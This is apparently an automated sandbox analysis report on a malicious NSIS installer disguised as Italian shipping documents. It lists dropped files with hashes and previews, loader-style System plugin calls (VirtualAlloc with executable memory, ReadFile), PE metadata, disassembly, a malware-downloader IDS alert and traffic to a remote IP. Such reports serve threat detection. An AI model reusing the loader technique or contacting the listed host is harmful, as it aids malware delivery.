                                          Preview:radiatoporose psychophonasthenia byjubilum,sirrees kyserne meathead dormitorier unarbitrative siddembelets kilopondene..locomutation josies sketchene tordentalerne budcykler beaumont naphthous frkkert..stenddes incorporable billowing dorsilateral bogkrybberne staler shantungfrakkes affy jaspilite..hanbury lastede smrrebrdsbutikkers keloids lydighedsngtelsers mesokurtic defectless banenettenes brkmidlernes preceded undfangedes querela afstandsmaalers..alexipharmical egenvgte acarids descends compresbyter buy,
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):305301
                                          Entropy (8bit):1.2617727746454932
                                          Encrypted:false
                                          SSDEEP:768:OFl7dydtg1PEAqjKsB0peIl0LVJmpGgJQZwWmkYvYTDjBlqndyzkEV5ndnGVa76E:hdKCZmTCLm4TyycJrcYKLdL59NBGa
                                          MD5:EADA66A6285325455F7E0780C000CB65
                                          SHA1:125A71ABF2ADCCFE6E4BB3D7BF80CAC064F71690
                                          SHA-256:D1E27B338C60688975AE1BB239D860E30490A7FEB5AEB1DF1DAD87244DD073AC
                                          SHA-512:669BA190147018B4CBA35D6CDE23D00683E73DE0C70B60C1AA03EDEC2C7CC629DA73A7495DB05CF4151E100C339C76AFD87A3D179FE98045ED38B02A7A478FB1
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....................................?...........................~.............u....................................................................C....m...............................6....................................?...............^.......n...............................................................................................................[........................................................R..].......................L....h.............................................................s...................................................,.............=.............6........................3.... ...K.................................?.Z.............\...7..8. ....................................................&......................y........................................................................@...................g..................f................w.................................................?........................u.....W.Z. ..........................
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):302102
                                          Entropy (8bit):1.2507376038892632
                                          Encrypted:false
                                          SSDEEP:768:+0WlDZ0cyMp2n0GbzqUGvbn/eHiEmNAXxM4cCQHkR1WuFkHnvVG26UZRR15NykM4:b0/vvkPqdcKMyJAnrZpdZ
                                          MD5:43EB990B1BE1B4570969A310174D319F
                                          SHA1:BEAE29DB714C0576F1BA9256E64F1A0A015B3E84
                                          SHA-256:6884CDA80715F73C9D9AA9AD45B9BDE3D9965D2009270BA685B30DD21421C04D
                                          SHA-512:C0FBE88619A7BC3BB8F6CBC8B77B4C1E21A2AFB8A92B1DF4324C20980C5CF6362CB75B7D065391437147BA746A933EBBD51167E4DF2B94477298A87331E15C75
                                          Malicious:false
                                          Reputation:low
                                          Preview:.............................................u..................$....................................G........H.................................................u'..................................{..........&...............................N......................................H.........S..............................................................M.............v.........................J..................................................................................B......................................`........q......................G....%.L...............%.........b.........................>.................................f..<.................................<...l..............P......].....................................d.....H........{......................>...............3........................................j......................................@..............v.............................L..........S................f....2................................................
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):398964
                                          Entropy (8bit):1.2601730304396117
                                          Encrypted:false
                                          SSDEEP:1536:qIRuZM0E+SCsypSaDWDKQreAN/Ge8+QM8+cj4WHOlXtZ:pRuPs3DKYc5+QM1KW
                                          MD5:34495288F83EB902AC00567354E11253
                                          SHA1:F421E0A307361C05A9534639D2B3A446F4673BAF
                                          SHA-256:F917E97748DEE607ABCC405FA70D7614B2F96675914B64AE7FD6AC299BCF220B
                                          SHA-512:E2DE646C75526DDA1B22AEBFF7B7991DEC89D351012FA21D925046EF5DD78ABD2D999ACAAE7C8BA33747480D3C921CDAB05D98839AF3A552063070A3B4C48496
                                          Malicious:false
                                          Reputation:low
                                          Preview:.................i....................9........T............................................................g....................................................................6...................?..............].Z.....................................................}...6..............................<....................................................:..x.............;...............P..m...h.........................................................................................................................O..............d....P...................w..........u....3.....................................................:.......^......m.................................................................................................X.............3...................................m.................................................4...L..............................................................................................G.................................1.........."..5...........
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:Matlab v4 mat-file (little endian) , numeric, rows 20224, columns 0
                                          Category:dropped
                                          Size (bytes):241857
                                          Entropy (8bit):1.2492742831199217
                                          Encrypted:false
                                          SSDEEP:768:kn4C0nabowYKKucVjMHtvH3Eq1Zg5c+0o4u1uLlOxRuYP9aVsVL/e3ec6Axhe7rO:zAzhHNuZla85OxXCm
                                          MD5:FB3375E7CB0698DF507062161A26885F
                                          SHA1:5E98C5E6F50A1B57B1E72B412D9632603FF954EF
                                          SHA-256:EB781B87F06CBBB43E36413F70A97528DFF827A3DA9575E56142324F9CF43477
                                          SHA-512:949FB9F863EB2EC85B84C4DB3E4EA023F1C3FC09CB79FE52B58569C616FC28F2E0D095DB535C3B80EF44CE4F75EA4752313F4F20A3E3A61E49163FCE8078B79B
                                          Malicious:false
                                          Reputation:low
                                          Preview:.....O..............c...>........................q....................r...................W............................................................................................................up........................r.................".............................................~...........9...............+.....................................................................................W...............Y..............................................k.....J................... ................................................R..................................................................................5...............T.........................................O..........^........x...........W.......Q......................:......H............+.................................................................6.................................7............w..........s......$...........9..................................................................*........................
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):387139
                                          Entropy (8bit):7.029080344859661
                                          Encrypted:false
                                          SSDEEP:6144:DKJqy+wdTormUTsLnezqBg7Eg/XicZi0Ikufi+k:DryBdETsLezqAXiUi+
                                          MD5:85FC6CABF335CE81CBAE00B602A9EEB1
                                          SHA1:ABE79A178FCFF6F54785BF739B5B3DA2C5DDD335
                                          SHA-256:0FE88C31B5927FF5D298B958B8249F73932CD0626BE40BC4F0C53E4C1FEE194B
                                          SHA-512:2E9B68C198E5A0D2BA42013FCB1EE49C3378916383EE6709E7D4E8CFF072D3778597BB0C89ACA44BF9A8551B8D5D92E7BB5ECE6D771710CBA7E1BC319A5A3D99
                                          Malicious:false
                                          Reputation:low
                                          Preview:.Q.......__...11111.ff.ff.~~~~.w..b................................;.W.333....B......................-........... ..............)...............nnn........v.....................77..SS....=====..LLLL.iiii.Q.``....KKKKK...............................{{....!..V.....a..............%..XX.................!....z..g..zz....iiiiii.................................FF..<<<...K..............X.............gggg..............```......................rr.........*.w..........zz..........<<..............1...;.......h...................J......qq........0.U.......................99........................@.......j...........~...................W............j........D..j.;.............2...........S..............................666...............[.............oo.]..................BBBB...x..............................>. ..HHH.........................r.....s........................_......yyyy.SSSSS....}}.........~............f...............................-.................W...AA...................JJJJJ.$
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):30
                                          Entropy (8bit):4.256564762130954
                                          Encrypted:false
                                          SSDEEP:3:DyWgLQIfLBJXmgU:mkIP25
                                          MD5:F15BFDEBB2DF02D02C8491BDE1B4E9BD
                                          SHA1:93BD46F57C3316C27CAD2605DDF81D6C0BDE9301
                                          SHA-256:C87F2FF45BB530577FB8856DF1760EDAF1060AE4EE2934B17FDD21B7D116F043
                                          SHA-512:1757ED4AE4D47D0C839511C18BE5D75796224D4A3049E2D8853650ACE2C5057C42040DE6450BF90DD4969862E9EBB420CD8A34F8DD9C970779ED2E5459E8F2F1
                                          Malicious:false
                                          Reputation:moderate, very likely benign file
                                          Preview:user32::EnumWindows(i r1 ,i 0)
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                          Category:dropped
                                          Size (bytes):11264
                                          Entropy (8bit):5.7711167426271945
                                          Encrypted:false
                                          SSDEEP:192:OPtkumJX7zB22kGwfy0mtVgkCPOsX1un:/702k5qpdsXQn
                                          MD5:3F176D1EE13B0D7D6BD92E1C7A0B9BAE
                                          SHA1:FE582246792774C2C9DD15639FFA0ACA90D6FD0B
                                          SHA-256:FA4AB1D6F79FD677433A31ADA7806373A789D34328DA46CCB0449BBF347BD73E
                                          SHA-512:0A69124819B7568D0DEA4E9E85CE8FE61C7BA697C934E3A95E2DCFB9F252B1D9DA7FAF8774B6E8EFD614885507ACC94987733EBA09A2F5E7098B774DFC8524B6
                                          Malicious:false
                                          Antivirus:
                                          • Antivirus: ReversingLabs, Detection: 0%
                                          Joe Sandbox View:
                                          • Filename: DHL AWB - COMMERCIAL INVOICE AND BL.exe, Detection: malicious, Browse
                                          • Filename: Shipping Documents.bat.exe, Detection: malicious, Browse
                                          • Filename: Oogoninia.exe, Detection: malicious, Browse
                                          • Filename: Oogoninia.exe, Detection: malicious, Browse
                                          • Filename: rStopfodringer.exe, Detection: malicious, Browse
                                          • Filename: rStopfodringer.exe, Detection: malicious, Browse
                                          • Filename: Transferencia 10-7-2024.exe, Detection: malicious, Browse
                                          • Filename: Transferencia 10-7-2024.exe, Detection: malicious, Browse
                                          • Filename: PEDIDO-144848.exe, Detection: malicious, Browse
                                          • Filename: PEDIDO-144848.exe, Detection: malicious, Browse
                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)...m.m.m...k.m.~....j.9..i....l....l.Richm.........................PE..L.....MX...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text...O........................... ..`.rdata..S....0......."..............@..@.data...h....@.......&..............@....reloc..`....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):56
                                          Entropy (8bit):4.250903860294566
                                          Encrypted:false
                                          SSDEEP:3:sAAEVvjsUjXRJ8VL84n:fLXrv8P
                                          MD5:1B6DC57065799BCB1BF29C6C14892FEA
                                          SHA1:6569CBC8651ADFD9A73667DE6915DE2FB17C45F0
                                          SHA-256:2C587AD3A444FDC29A480B76A140CC9ACE7CB887EB62B57073A2BA14B9E6C06A
                                          SHA-512:959C12B4407A8648091E0B754705C12AE0918A07D7E82BD1524DA3A74859409AC0DE0C32FAF0667A86D2A00B30F40CD743F7FE5E0D5D7BDFD4C27AECE86A4EB0
                                          Malicious:false
                                          Preview:kernel32::ReadFile(i r5, i r1, i 64999424,*i 0, i 0)i.r3
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):60
                                          Entropy (8bit):4.456297888280895
                                          Encrypted:false
                                          SSDEEP:3:sEMBQEJkJVEjzXRJ2F3WxQoXUn:Uv2F3WxvUn
                                          MD5:2EB7EED4B759B0203446B88DB44C52E7
                                          SHA1:39392DA939C9F29AB79A0F71BA3DDE628E4F7449
                                          SHA-256:F87673D947A448A21D48AAA02C39AAD5EA28B8AD68CEAAC4A3A75DC5563558C5
                                          SHA-512:992D2B6E83165064D985D76B67A4021C944C97D6A8407DD1D7E44A9290A00E937EAD4ECB0ED2C7487A43797E3BE80D77C657DB663F3C423A6D351D51752D9C57
                                          Malicious:false
                                          Preview:kernel32::VirtualAlloc(i 0,i 64999424, i 0x3000, i 0x40)p.r1
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):52
                                          Entropy (8bit):4.0914493934217315
                                          Encrypted:false
                                          SSDEEP:3:sBa99k1NoCFOn:KankVg
                                          MD5:5D04A35D3950677049C7A0CF17E37125
                                          SHA1:CAFDD49A953864F83D387774B39B2657A253470F
                                          SHA-256:A9493973DD293917F3EBB932AB255F8CAC40121707548DE100D5969956BB1266
                                          SHA-512:C7B1AFD95299C0712BDBC67F9D2714926D6EC9F71909AF615AFFC400D8D2216AB76F6AC35057088836435DE36E919507E1B25BE87B07C911083F964EB67E003B
                                          Malicious:false
                                          Preview:kernel32::SetFilePointer(i r5, i 1200 , i 0,i 0)i.r3
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:ASCII text, with no line terminators
                                          Category:dropped
                                          Size (bytes):74
                                          Entropy (8bit):3.9637832956585757
                                          Encrypted:false
                                          SSDEEP:3:sRQE1wFEt/ijNJyI3dj2+n:aQEGiwh3D
                                          MD5:16D513397F3C1F8334E8F3E4FC49828F
                                          SHA1:4EE15AFCA81CA6A13AF4E38240099B730D6931F0
                                          SHA-256:D3C781A1855C8A70F5ACA88D9E2C92AFFFA80541334731F62CAA9494AA8A0C36
                                          SHA-512:4A350B790FDD2FE957E9AB48D5969B217AB19FC7F93F3774F1121A5F140FF9A9EAAA8FA30E06A9EF40AD776E698C2E65A05323C3ADF84271DA1716E75F5183C3
                                          Malicious:false
                                          Preview:kernel32::CreateFileA(m r4 , i 0x80000000, i 0, p 0, i 4, i 0x80, i 0)i.r5
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:data
                                          Category:dropped
                                          Size (bytes):2623208
                                          Entropy (8bit):2.6871493218639917
                                          Encrypted:false
                                          SSDEEP:12288:WryBdETsLezqAXiUinv0SMGP6gvBse+tJ:rBGTaezziUoYwBse+7
                                          MD5:AB67B6E0CF3F443E1232C647766CC6D5
                                          SHA1:761BD09E383907B0A575EC48F7E07C0243E39289
                                          SHA-256:39342F9D01E1A2E478A8484EEB2F1624C39E0A8F7528146C91C8A416F3A0A12F
                                          SHA-512:06F2D3B9CB14E5C0B76022FEEDBF130B8F5A58F35D559FBE1AF7802DB66A3439BDCC44B57570FEDA4EEA89B6D2504FAE331CDB3BB265AF8521DDDD5BAA5FE00E
                                          Malicious:false
                                          Preview:.@......,........................0.......?.......@..........................]...{...........................................................................................................................................................................................................J...N...............j...............................................................................................................................g...........................................................................L...".......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                          Process:C:\Users\user\Desktop\Documenti di spedizione.bat.exe
                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=hide
                                          Category:dropped
                                          Size (bytes):1328
                                          Entropy (8bit):3.1387620248712413
                                          Encrypted:false
                                          SSDEEP:24:8JvaRkD4/BPefDbDLqizZYpbDyizZeiQ5HALqy:8oRkDsxy/DLqiNwDyiNlGAOy
                                          MD5:00B633B3058EB6B6ED779B0F83D7B527
                                          SHA1:7DF1967B9062572EB90E3FA55CA8E1F2A9452634
                                          SHA-256:45A8D19A59C6CD5A7EE6E1A547236CB0C816C4E0644A4605031A8EFFB45B56A4
                                          SHA-512:3FA7F8256017FC3E7DF736D634001AAC64120858F0171560993590FFA7B34EDC1FA39BA4E5A980A0EEE5E2D9D024E4D1AC195B300994E4CF0EC9114E4B544783
                                          Malicious:false
                                          Preview:L..................F.............................................................P.O. .:i.....+00.../C:\...................P.1...........Users.<............................................U.s.e.r.s.....T.1...........user..>............................................a.l.f.o.n.s.....V.1...........AppData.@............................................A.p.p.D.a.t.a.....P.1...........Local.<............................................L.o.c.a.l.....\.1...........Microsoft.D............................................M.i.c.r.o.s.o.f.t.....V.1...........Windows.@............................................W.i.n.d.o.w.s.....\.1...........INetCache.D............................................I.N.e.t.C.a.c.h.e.....n.2...........divergentes.pin.P............................................d.i.v.e.r.g.e.n.t.e.s...p.i.n.......;...\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.I.N.e.t.C.a.c.h.e.\.d.i.v.e.r.g.e.n.t.e.s...p.i.n.U.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t
                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                          Entropy (8bit):7.277864141975884
                                          TrID:
                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                          • DOS Executable Generic (2002/1) 0.02%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                          File name:Documenti di spedizione.bat.exe
                                          File size:1'007'169 bytes
                                          MD5:c2d72d131fe371481a0cc117bb835f23
                                          SHA1:dd736a4b716d790f1a3b304f265530399e0646aa
                                          SHA256:d5ee11c69acd2903e1d9b6f6b59aabbd66d9a38430fe4a020d48b18707afb9b8
                                          SHA512:79c15f7b54322f2843f203a99605b5cdfd6a0a3fe41bf9265808a266d1c68d099f3fab8354a0d87e53eb673b101ca211a422748c232c725cadb3f4ebf6c9ce39
                                          SSDEEP:24576:co8RUr/5+1z5qy4liClnpwWcw0r0ye66RnKUgGEM71KOx5hw:ch+/0qygxlpvAGOsKOm
                                          TLSH:0125F1E2F38045A6F4790936888BC2E152F0EDE29E421A57137CF36D1DB32D1465BDBA
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...5.MX.................`.........
                                          Icon Hash:2f6b71f16d4c71b3
                                          Entrypoint:0x4032bf
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                          Time Stamp:0x584DCA35 [Sun Dec 11 21:50:45 2016 UTC]
                                          TLS Callbacks:
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:4f67aeda01a0484282e8c59006b0b352
                                          Instruction
                                          sub esp, 00000184h
                                          push ebx
                                          push esi
                                          push edi
                                          xor ebx, ebx
                                          push 00008001h
                                          mov dword ptr [esp+18h], ebx
                                          mov dword ptr [esp+10h], 00409130h
                                          mov dword ptr [esp+20h], ebx
                                          mov byte ptr [esp+14h], 00000020h
                                          call dword ptr [00407120h]
                                          call dword ptr [004070ACh]
                                          cmp ax, 00000006h
                                          je 00007FF0F50165B3h
                                          push ebx
                                          call 00007FF0F5019539h
                                          cmp eax, ebx
                                          je 00007FF0F50165A9h
                                          push 00000C00h
                                          call eax
                                          mov esi, 00407298h
                                          push esi
                                          call 00007FF0F50194B5h
                                          push esi
                                          call dword ptr [004070A8h]
                                          lea esi, dword ptr [esi+eax+01h]
                                          cmp byte ptr [esi], bl
                                          jne 00007FF0F501658Dh
                                          push ebp
                                          push 00000009h
                                          call 00007FF0F501950Ch
                                          push 00000007h
                                          call 00007FF0F5019505h
                                          mov dword ptr [00423724h], eax
                                          call dword ptr [00407044h]
                                          push ebx
                                          call dword ptr [00407288h]
                                          mov dword ptr [004237D8h], eax
                                          push ebx
                                          lea eax, dword ptr [esp+38h]
                                          push 00000160h
                                          push eax
                                          push ebx
                                          push 0041ECF0h
                                          call dword ptr [00407174h]
                                          push 004091ECh
                                          push 00422F20h
                                          call 00007FF0F501912Fh
                                          call dword ptr [004070A4h]
                                          mov ebp, 00429000h
                                          push eax
                                          push ebp
                                          call 00007FF0F501911Dh
                                          push ebx
                                          call dword ptr [00407154h]
                                          Programming Language:
                                          • [EXP] VC++ 6.0 SP5 build 8804
                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x470000x42ba0.rsrc
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x5e590x60001892c55874b94ef60ac62cf77f0ecd0eFalse0.6585693359375data6.424194540104456IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .rdata0x70000x12460x14006389f916226544852e494114faf192adFalse0.4271484375data5.0003960999706765IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          .data0x90000x1a8180x400f02c8b5709d3fb8c6cc1ab777c138d8fFalse0.6455078125data5.211928615453691IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .ndata0x240000x230000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rsrc0x470000x42ba00x42c00cb7fd179fd9ca3f4757b01d96679c1b0False0.21076559573970038data3.8403807556058642IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                          RT_ICON0x472080x42028Device independent bitmap graphic, 256 x 512 x 32, image size 270336EnglishUnited States0.20773293487587655
                                          RT_DIALOG0x892300x144dataEnglishUnited States0.5216049382716049
                                          RT_DIALOG0x893780x100dataEnglishUnited States0.5234375
                                          RT_DIALOG0x894780x11cdataEnglishUnited States0.6056338028169014
                                          RT_DIALOG0x895980x60dataEnglishUnited States0.7291666666666666
                                          RT_GROUP_ICON0x895f80x14dataEnglishUnited States1.1
                                          RT_VERSION0x896100x24cdataEnglishUnited States0.5357142857142857
                                          RT_MANIFEST0x898600x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                          DLLImport
                                          KERNEL32.dllCopyFileA, Sleep, GetTickCount, CreateFileA, GetFileSize, GetModuleFileNameA, ReadFile, GetFileAttributesA, SetFileAttributesA, ExitProcess, SetEnvironmentVariableA, GetWindowsDirectoryA, GetTempPathA, GetCommandLineA, lstrlenA, GetVersion, GetCurrentProcess, GetFullPathNameA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, GetTempFileNameA, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, CloseHandle, SetCurrentDirectoryA, MoveFileA, CompareFileTime, GetShortPathNameA, SearchPathA, lstrcmpiA, SetFileTime, lstrcmpA, ExpandEnvironmentStringsA, lstrcpynA, SetErrorMode, GlobalFree, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, GlobalAlloc
                                          USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA
                                          ADVAPI32.dllRegDeleteKeyA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, AdjustTokenPrivileges, RegOpenKeyExA, RegEnumValueA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                          ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                          Language of compilation systemCountry where language is spokenMap
                                          EnglishUnited States
                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-21T08:25:12.066632+02002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.56470284.38.129.1680TCP
                                          TimestampSource PortDest PortSource IPDest IP
                                          Oct 21, 2024 08:25:11.203861952 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:11.208935022 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:11.209048033 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:11.209271908 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:11.214044094 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.066445112 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.066463947 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.066476107 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.066488028 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.066500902 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.066512108 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.066632032 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.193813086 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.193834066 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.193845034 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.193855047 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.193867922 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.193886995 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.194015026 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.194025993 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.194036007 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.194050074 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.194066048 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.194077969 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.194353104 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.194364071 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.194375038 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.194432020 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.194432020 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.317609072 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317636013 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317651033 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317662001 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317682028 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317720890 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.317790031 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317795992 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.317801952 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317816019 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.317853928 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.317893028 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.318156004 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.318166971 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.318181992 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.318202019 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.318212986 CEST6470280192.168.2.584.38.129.16
                                          Oct 21, 2024 08:25:12.318212986 CEST806470284.38.129.16192.168.2.5
                                          Oct 21, 2024 08:25:12.318244934 CEST6470280192.168.2.584.38.129.16
